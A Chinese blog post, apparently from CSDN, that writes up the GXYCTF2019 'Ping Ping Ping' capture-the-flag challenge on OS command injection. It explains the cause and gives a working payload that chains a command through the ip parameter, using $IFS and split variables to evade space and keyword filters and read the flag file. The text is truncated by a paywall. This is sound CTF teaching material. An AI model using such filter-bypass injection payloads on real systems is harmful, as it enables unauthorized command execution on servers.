[GXYCTF2019]Ping Ping Ping {命令执行总结}

昂首下楼梯

于 2020-02-13 16:05:57 发布

阅读量5.9k

点赞数 7

分类专栏： BUUCTF 文章标签： php shell

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/qq_42812036/article/details/104297163

版权

0x00 知识点

命令执行
绕过空格、敏感字符、连接符

产生原因：
当应用需要调用一些外部程序去处理内容的情况下，就会用到一些执行系统命令的函数。如果用户可以控制命令执行函数中的参数时，就可以注入一些恶意的系统命令到正常命令，造成命令执行漏洞

0x01 解题

方法一内联执行

payload

?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php

ps: 参数顺序要注意，adc换位acdflag会被检测出来：）

过滤了?/\{}()[]* 否则bash语法可以用“？”，正斜杠“/”，数

最低0.47元/天解锁文章

昂首下楼梯

关注

7
点赞
踩
23

收藏

觉得还不错? 一键收藏
1
评论
[GXYCTF2019]Ping Ping Ping {命令执行总结}

0x00 知识点命令注入绕过空格、敏感字符、连接符0x01 解题方法一内联执行payload?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.phpps: 参数顺序要注意，adc换位acdflag会被检测出来：）过滤了?/\{}()[]* 否则bash语法可以用“？”，正斜杠“/”，数字和字母来执行系统命令。过滤空格1.使用<或者<&gt...
复制链接

扫一扫

专栏目录

评论 1

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。